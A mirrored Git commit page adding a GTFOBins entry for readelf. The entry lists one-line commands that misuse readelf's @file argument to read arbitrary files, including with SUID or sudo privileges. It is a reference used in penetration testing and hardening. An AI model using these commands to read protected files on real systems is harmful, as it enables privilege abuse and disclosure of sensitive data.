mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Create readelf.md
This commit is contained in:
parent
9652aee337
commit
6ebfcef36c
18
_gtfobins/readelf.md
Normal file
18
_gtfobins/readelf.md
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
---
|
||||||
|
description: |
|
||||||
|
Each line is corrupted by a prefix string and wrapped inside single quotes.
|
||||||
|
|
||||||
|
functions:
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
readelf -a @$LFILE
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
readelf -a @$LFILE
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo readelf -a @$LFILE
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user